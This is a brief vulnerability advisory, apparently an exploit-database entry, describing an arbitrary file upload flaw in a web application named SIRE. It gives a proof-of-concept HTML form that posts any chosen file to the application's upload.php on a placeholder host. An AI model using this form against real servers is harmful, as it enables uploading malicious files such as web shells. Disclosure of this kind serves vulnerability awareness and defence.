SIRE Arbitrary File Upload Vulnerability

SIRE Arbitrary File Upload Vulnerability

This issue can be exploited with a web client.

The following proof of concept is available:

<form enctype="multipart/form-data" method="post" action="http://Trajet/upload.php?"> Download File<br>

<input name="fichier" type="file" size="48"><br>
<input type="submit" name="upload" value="uploader"><form>